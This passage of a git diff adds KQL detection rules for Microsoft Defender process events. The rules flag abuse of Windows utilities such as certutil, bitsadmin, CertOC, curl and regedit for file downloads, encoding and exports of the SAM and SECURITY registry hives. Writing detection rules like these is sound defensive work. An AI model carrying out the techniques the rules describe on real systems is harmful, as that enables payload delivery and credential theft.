+// Description: Detects a command line process that uses explorer.exe to launch arbitrary commands or binaries,
+// which is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer spawning from "svchost"
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "/factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b}" or (ProcessCommandLine contains "explorer.exe" and (ProcessCommandLine contains " -root," or ProcessCommandLine contains " /root," or ProcessCommandLine contains " –root," or ProcessCommandLine contains " —root," or ProcessCommandLine contains " ―root,"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/exports_critical_registry_keys_to_a_file.kql b/KQL/rules/windows/process_creation/exports_critical_registry_keys_to_a_file.kql
new file mode 100644
index 00000000..4590dfd7
--- /dev/null
+++ b/KQL/rules/windows/process_creation/exports_critical_registry_keys_to_a_file.kql
@@ -0,0 +1,12 @@
+// Title: Exports Critical Registry Keys To a File
+// Author: Oddvar Moe, Sander Wiebing, oscd.community
+// Date: 2020-10-12
+// Level: high
+// Description: Detects the export of a crital Registry key to a file.
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.discovery, attack.t1012
+// False Positives:
+//   - Dumping hives for legitimate purpouse i.e. backup or forensic investigation
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -E " or ProcessCommandLine contains " /E " or ProcessCommandLine contains " –E " or ProcessCommandLine contains " —E " or ProcessCommandLine contains " ―E ") and (ProcessCommandLine contains "hklm" or ProcessCommandLine contains "hkey_local_machine") and (ProcessCommandLine endswith "\\system" or ProcessCommandLine endswith "\\sam" or ProcessCommandLine endswith "\\security") and (FolderPath endswith "\\regedit.exe" or ProcessVersionInfoOriginalFileName =~ "REGEDIT.EXE")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/exports_registry_key_to_a_file.kql b/KQL/rules/windows/process_creation/exports_registry_key_to_a_file.kql
new file mode 100644
index 00000000..f86b39b8
--- /dev/null
+++ b/KQL/rules/windows/process_creation/exports_registry_key_to_a_file.kql
@@ -0,0 +1,12 @@
+// Title: Exports Registry Key To a File
+// Author: Oddvar Moe, Sander Wiebing, oscd.community
+// Date: 2020-10-07
+// Level: low
+// Description: Detects the export of the target Registry key to a file.
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.discovery, attack.t1012
+// False Positives:
+//   - Legitimate export of keys
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " -E " or ProcessCommandLine contains " /E " or ProcessCommandLine contains " –E " or ProcessCommandLine contains " —E " or ProcessCommandLine contains " ―E ") and (FolderPath endswith "\\regedit.exe" or ProcessVersionInfoOriginalFileName =~ "REGEDIT.EXE")) and (not(((ProcessCommandLine contains "hklm" or ProcessCommandLine contains "hkey_local_machine") and (ProcessCommandLine endswith "\\system" or ProcessCommandLine endswith "\\sam" or ProcessCommandLine endswith "\\security"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/file_and_subfolder_enumeration_via_dir_command.kql b/KQL/rules/windows/process_creation/file_and_subfolder_enumeration_via_dir_command.kql
new file mode 100644
index 00000000..a359dd25
--- /dev/null
+++ b/KQL/rules/windows/process_creation/file_and_subfolder_enumeration_via_dir_command.kql
@@ -0,0 +1,12 @@
+// Title: File And SubFolder Enumeration Via Dir Command
+// Author: frack113
+// Date: 2021-12-13
+// Level: low
+// Description: Detects usage of the "dir" command part of Windows CMD with the "/S" command line flag in order to enumerate files in a specified directory and all subdirectories.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1217
+// False Positives:
+//   - Likely
+
+DeviceProcessEvents
+| where (ProcessCommandLine =~ "*dir*-s*" or ProcessCommandLine =~ "*dir*/s*" or ProcessCommandLine =~ "*dir*–s*" or ProcessCommandLine =~ "*dir*—s*" or ProcessCommandLine =~ "*dir*―s*") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/file_decoded_from_base64_hex_via_certutil_exe.kql b/KQL/rules/windows/process_creation/file_decoded_from_base64_hex_via_certutil_exe.kql
new file mode 100644
index 00000000..92b81623
--- /dev/null
+++ b/KQL/rules/windows/process_creation/file_decoded_from_base64_hex_via_certutil_exe.kql
@@ -0,0 +1,10 @@
+// Title: File Decoded From Base64/Hex Via Certutil.EXE
+// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
+// Date: 2023-02-15
+// Level: high
+// Description: Detects the execution of certutil with either the "decode" or "decodehex" flags to decode base64 or hex encoded files. This can be abused by attackers to decode an encoded payload before execution
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-decode " or ProcessCommandLine contains "/decode " or ProcessCommandLine contains "–decode " or ProcessCommandLine contains "—decode " or ProcessCommandLine contains "―decode " or ProcessCommandLine contains "-decodehex " or ProcessCommandLine contains "/decodehex " or ProcessCommandLine contains "–decodehex " or ProcessCommandLine contains "—decodehex " or ProcessCommandLine contains "―decodehex ") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/file_decryption_using_gpg4win.kql b/KQL/rules/windows/process_creation/file_decryption_using_gpg4win.kql
new file mode 100644
index 00000000..c701334d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/file_decryption_using_gpg4win.kql
@@ -0,0 +1,10 @@
+// Title: File Decryption Using Gpg4win
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-09
+// Level: medium
+// Description: Detects usage of Gpg4win to decrypt files
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -d " and ProcessCommandLine contains "passphrase") and ((FolderPath endswith "\\gpg.exe" or FolderPath endswith "\\gpg2.exe") or ProcessVersionInfoFileDescription =~ "GnuPG’s OpenPGP tool")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/file_deletion_via_del.kql b/KQL/rules/windows/process_creation/file_deletion_via_del.kql
new file mode 100644
index 00000000..69bf76f7
--- /dev/null
+++ b/KQL/rules/windows/process_creation/file_deletion_via_del.kql
@@ -0,0 +1,15 @@
+// Title: File Deletion Via Del
+// Author: frack113
+// Date: 2022-01-15
+// Level: low
+// Description: Detects execution of the builtin "del"/"erase" commands in order to delete files.
+// Adversaries may delete files left behind by the actions of their intrusion activity.
+// Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how.
+// Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.004
+// False Positives:
+//   - False positives levels will differ Depending on the environment. You can use a combination of ParentImage and other keywords from the CommandLine field to filter legitimate activity
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "del " or ProcessCommandLine contains "erase ") and (ProcessCommandLine contains " -f" or ProcessCommandLine contains " /f" or ProcessCommandLine contains " –f" or ProcessCommandLine contains " —f" or ProcessCommandLine contains " ―f" or ProcessCommandLine contains " -s" or ProcessCommandLine contains " /s" or ProcessCommandLine contains " –s" or ProcessCommandLine contains " —s" or ProcessCommandLine contains " ―s" or ProcessCommandLine contains " -q" or ProcessCommandLine contains " /q" or ProcessCommandLine contains " –q" or ProcessCommandLine contains " —q" or ProcessCommandLine contains " ―q") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/file_download_and_execution_via_ieexec_exe.kql b/KQL/rules/windows/process_creation/file_download_and_execution_via_ieexec_exe.kql
new file mode 100644
index 00000000..d208417f
--- /dev/null
+++ b/KQL/rules/windows/process_creation/file_download_and_execution_via_ieexec_exe.kql
@@ -0,0 +1,10 @@
+// Title: File Download And Execution Via IEExec.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-05-16
+// Level: high
+// Description: Detects execution of the IEExec utility to download and execute files
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\IEExec.exe" or ProcessVersionInfoOriginalFileName =~ "IEExec.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/file_download_from_browser_process_via_inline_url.kql b/KQL/rules/windows/process_creation/file_download_from_browser_process_via_inline_url.kql
new file mode 100644
index 00000000..2ec8624d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/file_download_from_browser_process_via_inline_url.kql
@@ -0,0 +1,10 @@
+// Title: File Download From Browser Process Via Inline URL
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-01-11
+// Level: medium
+// Description: Detects execution of a browser process with a URL argument pointing to a file with a potentially interesting extension. This can be abused to download arbitrary files or to hide from the user for example by launching the browser in a minimized state.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+
+DeviceProcessEvents
+| where ((ProcessCommandLine endswith ".7z" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".exe" or ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".psm1" or ProcessCommandLine endswith ".txt" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".zip") or (ProcessCommandLine contains ".7z\"" or ProcessCommandLine contains ".dat\"" or ProcessCommandLine contains ".dll\"" or ProcessCommandLine contains ".hta\"" or ProcessCommandLine contains ".ps1\"" or ProcessCommandLine contains ".psm1\"" or ProcessCommandLine contains ".txt\"" or ProcessCommandLine contains ".vbe\"" or ProcessCommandLine contains ".vbs\"" or ProcessCommandLine contains ".zip\"")) and ProcessCommandLine contains "http" and (FolderPath endswith "\\brave.exe" or FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\opera.exe" or FolderPath endswith "\\vivaldi.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/file_download_from_ip_based_url_via_certoc_exe.kql b/KQL/rules/windows/process_creation/file_download_from_ip_based_url_via_certoc_exe.kql
new file mode 100644
index 00000000..94652062
--- /dev/null
+++ b/KQL/rules/windows/process_creation/file_download_from_ip_based_url_via_certoc_exe.kql
@@ -0,0 +1,10 @@
+// Title: File Download From IP Based URL Via CertOC.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-10-18
+// Level: high
+// Description: Detects when a user downloads a file from an IP based URL using CertOC.exe
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.execution, attack.t1105
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "-GetCACAPS" and (FolderPath endswith "\\certoc.exe" or ProcessVersionInfoOriginalFileName =~ "CertOC.exe") and ProcessCommandLine matches regex "://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/file_download_from_ip_url_via_curl_exe.kql b/KQL/rules/windows/process_creation/file_download_from_ip_url_via_curl_exe.kql
new file mode 100644
index 00000000..74fa57c8
--- /dev/null
+++ b/KQL/rules/windows/process_creation/file_download_from_ip_url_via_curl_exe.kql
@@ -0,0 +1,10 @@
+// Title: File Download From IP URL Via Curl.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-10-18
+// Level: medium
+// Description: Detects file downloads directly from IP address URL using curl.exe
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " -O" or ProcessCommandLine contains "--remote-name" or ProcessCommandLine contains "--output") and ProcessCommandLine contains "http" and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe") and ProcessCommandLine matches regex "://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}") and (not((ProcessCommandLine endswith ".bat" or ProcessCommandLine endswith ".bat\"" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".dat\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".dll\"" or ProcessCommandLine endswith ".exe" or ProcessCommandLine endswith ".exe\"" or ProcessCommandLine endswith ".gif" or ProcessCommandLine endswith ".gif\"" or ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".hta\"" or ProcessCommandLine endswith ".jpeg" or ProcessCommandLine endswith ".jpeg\"" or ProcessCommandLine endswith ".log" or ProcessCommandLine endswith ".log\"" or ProcessCommandLine endswith ".msi" or ProcessCommandLine endswith ".msi\"" or ProcessCommandLine endswith ".png" or ProcessCommandLine endswith ".png\"" or ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".ps1\"" or ProcessCommandLine endswith ".psm1" or ProcessCommandLine endswith ".psm1\"" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbe\"" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".vbs\"" or ProcessCommandLine endswith ".bat'" or ProcessCommandLine endswith ".dat'" or ProcessCommandLine endswith ".dll'" or ProcessCommandLine endswith ".exe'" or ProcessCommandLine endswith ".gif'" or ProcessCommandLine endswith ".hta'" or ProcessCommandLine endswith ".jpeg'" or ProcessCommandLine endswith ".log'" or ProcessCommandLine endswith ".msi'" or ProcessCommandLine endswith ".png'" or ProcessCommandLine endswith ".ps1'" or ProcessCommandLine endswith ".psm1'" or ProcessCommandLine endswith ".vbe'" or ProcessCommandLine endswith ".vbs'")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/file_download_using_notepad_gup_utility.kql b/KQL/rules/windows/process_creation/file_download_using_notepad_gup_utility.kql
new file mode 100644
index 00000000..79f3f0e3
--- /dev/null
+++ b/KQL/rules/windows/process_creation/file_download_using_notepad_gup_utility.kql
@@ -0,0 +1,12 @@
+// Title: File Download Using Notepad++ GUP Utility
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-10
+// Level: high
+// Description: Detects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+// False Positives:
+//   - Other parent processes other than notepad++ using GUP that are not currently identified
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " -unzipTo " and ProcessCommandLine contains "http") and (FolderPath endswith "\\GUP.exe" or ProcessVersionInfoOriginalFileName =~ "gup.exe")) and (not(InitiatingProcessFolderPath endswith "\\notepad++.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/file_download_using_protocolhandler_exe.kql b/KQL/rules/windows/process_creation/file_download_using_protocolhandler_exe.kql
new file mode 100644
index 00000000..bfa9c152
--- /dev/null
+++ b/KQL/rules/windows/process_creation/file_download_using_protocolhandler_exe.kql
@@ -0,0 +1,10 @@
+// Title: File Download Using ProtocolHandler.exe
+// Author: frack113
+// Date: 2021-07-13
+// Level: medium
+// Description: Detects usage of "ProtocolHandler" to download files. Downloaded files will be located in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "ftp://" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\protocolhandler.exe" or ProcessVersionInfoOriginalFileName =~ "ProtocolHandler.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/file_download_via_bitsadmin.kql b/KQL/rules/windows/process_creation/file_download_via_bitsadmin.kql
new file mode 100644
index 00000000..f4f2a035
--- /dev/null
+++ b/KQL/rules/windows/process_creation/file_download_via_bitsadmin.kql
@@ -0,0 +1,12 @@
+// Title: File Download Via Bitsadmin
+// Author: Michael Haag, FPT.EagleEye
+// Date: 2017-03-09
+// Level: medium
+// Description: Detects usage of bitsadmin downloading a file
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003
+// False Positives:
+//   - Some legitimate apps use this, but limited.
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe") and (ProcessCommandLine contains " /transfer " or ((ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and ProcessCommandLine contains "http"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/file_download_via_bitsadmin_to_a_suspicious_target_folder.kql b/KQL/rules/windows/process_creation/file_download_via_bitsadmin_to_a_suspicious_target_folder.kql
new file mode 100644
index 00000000..f2966d71
--- /dev/null
+++ b/KQL/rules/windows/process_creation/file_download_via_bitsadmin_to_a_suspicious_target_folder.kql
@@ -0,0 +1,10 @@
+// Title: File Download Via Bitsadmin To A Suspicious Target Folder
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-28
+// Level: high
+// Description: Detects usage of bitsadmin downloading a file to a suspicious target folder
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " /transfer " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and (ProcessCommandLine contains ":\\Perflogs" or ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Roaming\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "%ProgramData%" or ProcessCommandLine contains "%public%") and (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/file_download_via_bitsadmin_to_an_uncommon_target_folder.kql b/KQL/rules/windows/process_creation/file_download_via_bitsadmin_to_an_uncommon_target_folder.kql
new file mode 100644
index 00000000..dc75d930
--- /dev/null
+++ b/KQL/rules/windows/process_creation/file_download_via_bitsadmin_to_an_uncommon_target_folder.kql
@@ -0,0 +1,10 @@
+// Title: File Download Via Bitsadmin To An Uncommon Target Folder
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-28
+// Level: medium
+// Description: Detects usage of bitsadmin downloading a file to uncommon target folder
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " /transfer " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and (ProcessCommandLine contains "%AppData%" or ProcessCommandLine contains "%temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains "\\AppData\\Local\\" or ProcessCommandLine contains "C:\\Windows\\Temp\\") and (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/file_download_via_certoc_exe.kql b/KQL/rules/windows/process_creation/file_download_via_certoc_exe.kql
new file mode 100644
index 00000000..c568e3e0
--- /dev/null
+++ b/KQL/rules/windows/process_creation/file_download_via_certoc_exe.kql
@@ -0,0 +1,10 @@
+// Title: File Download via CertOC.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-05-16
+// Level: medium
+// Description: Detects when a user downloads a file by using CertOC.exe
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-GetCACAPS" and ProcessCommandLine contains "http") and (FolderPath endswith "\\certoc.exe" or ProcessVersionInfoOriginalFileName =~ "CertOC.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/file_download_via_installutil_exe.kql b/KQL/rules/windows/process_creation/file_download_via_installutil_exe.kql
new file mode 100644
index 00000000..e1383f7d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/file_download_via_installutil_exe.kql
@@ -0,0 +1,10 @@
+// Title: File Download Via InstallUtil.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-19
+// Level: medium
+// Description: Detects use of .NET InstallUtil.exe in order to download arbitrary files. The files will be written to "%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\"
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "ftp://" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\InstallUtil.exe" or ProcessVersionInfoOriginalFileName =~ "InstallUtil.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/file_download_via_windows_defender_mpcmprun_exe.kql b/KQL/rules/windows/process_creation/file_download_via_windows_defender_mpcmprun_exe.kql
new file mode 100644
index 00000000..a7430eb1
--- /dev/null
+++ b/KQL/rules/windows/process_creation/file_download_via_windows_defender_mpcmprun_exe.kql
@@ -0,0 +1,10 @@
+// Title: File Download Via Windows Defender MpCmpRun.EXE
+// Author: Matthew Matchen
+// Date: 2020-09-04
+// Level: high
+// Description: Detects the use of Windows Defender MpCmdRun.EXE to download files
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218, attack.command-and-control, attack.t1105
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "DownloadFile" and ProcessCommandLine contains "url") and (ProcessVersionInfoOriginalFileName =~ "MpCmdRun.exe" or FolderPath endswith "\\MpCmdRun.exe" or ProcessCommandLine contains "MpCmdRun.exe" or ProcessVersionInfoFileDescription =~ "Microsoft Malware Protection Command Line Utility")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/file_download_with_headless_browser.kql b/KQL/rules/windows/process_creation/file_download_with_headless_browser.kql
new file mode 100644
index 00000000..fc899b61
--- /dev/null
+++ b/KQL/rules/windows/process_creation/file_download_with_headless_browser.kql
@@ -0,0 +1,10 @@
+// Title: File Download with Headless Browser
+// Author: Sreeman, Florian Roth (Nextron Systems)
+// Date: 2022-01-04
+// Level: high
+// Description: Detects execution of chromium based browser in headless mode using the "dump-dom" command line to download files
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.command-and-control, attack.t1105, attack.t1564.003
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "--headless" and ProcessCommandLine contains "dump-dom" and ProcessCommandLine contains "http") and (FolderPath endswith "\\brave.exe" or FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\opera.exe" or FolderPath endswith "\\vivaldi.exe")) and (not(((ProcessCommandLine contains "--headless --disable-gpu --disable-extensions --disable-plugins --mute-audio --no-first-run --incognito --aggressive-cache-discard --dump-dom" and (FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\msedgewebview2.exe" or FolderPath endswith "\\MicrosoftEdge.exe") and (FolderPath startswith "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\" or FolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeCore\\" or FolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\" or FolderPath startswith "C:\\Program Files\\Microsoft\\Edge\\Application\\" or FolderPath startswith "C:\\Program Files\\Microsoft\\EdgeCore\\" or FolderPath startswith "C:\\Program Files\\Microsoft\\EdgeWebView\\" or FolderPath startswith "C:\\Program Files\\WindowsApps\\Microsoft.MicrosoftEdge")) or (ProcessCommandLine contains "--headless --disable-gpu --disable-extensions --disable-plugins --mute-audio --no-first-run --incognito --aggressive-cache-discard --dump-dom" and (FolderPath contains "\\AppData\\Local\\Microsoft\\WindowsApps\\" or FolderPath contains "\\Windows\\SystemApps\\Microsoft.MicrosoftEdge") and (FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\MicrosoftEdge.exe")))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/file_encoded_to_base64_via_certutil_exe.kql b/KQL/rules/windows/process_creation/file_encoded_to_base64_via_certutil_exe.kql
new file mode 100644
index 00000000..a082c43e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/file_encoded_to_base64_via_certutil_exe.kql
@@ -0,0 +1,12 @@
+// Title: File Encoded To Base64 Via Certutil.EXE
+// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-02-24
+// Level: medium
+// Description: Detects the execution of certutil with the "encode" flag to encode a file to base64. This can be abused by threat actors and attackers for data exfiltration
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027
+// False Positives:
+//   - As this is a general purpose rule, legitimate usage of the encode functionality will trigger some false positives. Apply additional filters accordingly
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-encode" or ProcessCommandLine contains "/encode" or ProcessCommandLine contains "–encode" or ProcessCommandLine contains "—encode" or ProcessCommandLine contains "―encode") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/file_encryption_decryption_via_gpg4win_from_suspicious_locations.kql b/KQL/rules/windows/process_creation/file_encryption_decryption_via_gpg4win_from_suspicious_locations.kql
new file mode 100644
index 00000000..c8c8fd94
--- /dev/null
+++ b/KQL/rules/windows/process_creation/file_encryption_decryption_via_gpg4win_from_suspicious_locations.kql
@@ -0,0 +1,10 @@
+// Title: File Encryption/Decryption Via Gpg4win From Suspicious Locations
+// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
+// Date: 2022-11-30
+// Level: high
+// Description: Detects usage of Gpg4win to encrypt/decrypt files located in potentially suspicious locations.
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "-passphrase" and ((FolderPath endswith "\\gpg.exe" or FolderPath endswith "\\gpg2.exe") or ProcessVersionInfoProductName =~ "GNU Privacy Guard (GnuPG)" or ProcessVersionInfoFileDescription =~ "GnuPG’s OpenPGP tool") and (ProcessCommandLine contains ":\\PerfLogs\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Roaming\\")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/file_encryption_using_gpg4win.kql b/KQL/rules/windows/process_creation/file_encryption_using_gpg4win.kql
new file mode 100644
index 00000000..482ba056
--- /dev/null
+++ b/KQL/rules/windows/process_creation/file_encryption_using_gpg4win.kql
@@ -0,0 +1,10 @@
+// Title: File Encryption Using Gpg4win
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-09
+// Level: medium
+// Description: Detects usage of Gpg4win to encrypt files
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -c " and ProcessCommandLine contains "passphrase") and ((FolderPath endswith "\\gpg.exe" or FolderPath endswith "\\gpg2.exe") or ProcessVersionInfoFileDescription =~ "GnuPG’s OpenPGP tool")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/file_explorer_folder_opened_using_explorer_folder_shortcut_via_shell.kql b/KQL/rules/windows/process_creation/file_explorer_folder_opened_using_explorer_folder_shortcut_via_shell.kql
new file mode 100644
index 00000000..557b39cc
--- /dev/null
+++ b/KQL/rules/windows/process_creation/file_explorer_folder_opened_using_explorer_folder_shortcut_via_shell.kql
@@ -0,0 +1,10 @@
+// Title: File Explorer Folder Opened Using Explorer Folder Shortcut Via Shell
+// Author: @Kostastsale
+// Date: 2022-12-22
+// Level: high
+// Description: Detects the initial execution of "cmd.exe" which spawns "explorer.exe" with the appropriate command line arguments for opening the "My Computer" folder.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1135
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "shell:mycomputerfolder" and FolderPath endswith "\\explorer.exe" and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/file_in_suspicious_location_encoded_to_base64_via_certutil_exe.kql b/KQL/rules/windows/process_creation/file_in_suspicious_location_encoded_to_base64_via_certutil_exe.kql
new file mode 100644
index 00000000..11db1924
--- /dev/null
+++ b/KQL/rules/windows/process_creation/file_in_suspicious_location_encoded_to_base64_via_certutil_exe.kql
@@ -0,0 +1,10 @@
+// Title: File In Suspicious Location Encoded To Base64 Via Certutil.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-15
+// Level: high
+// Description: Detects the execution of certutil with the "encode" flag to encode a file to base64 where the files are located in potentially suspicious locations
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027
+
+DeviceProcessEvents
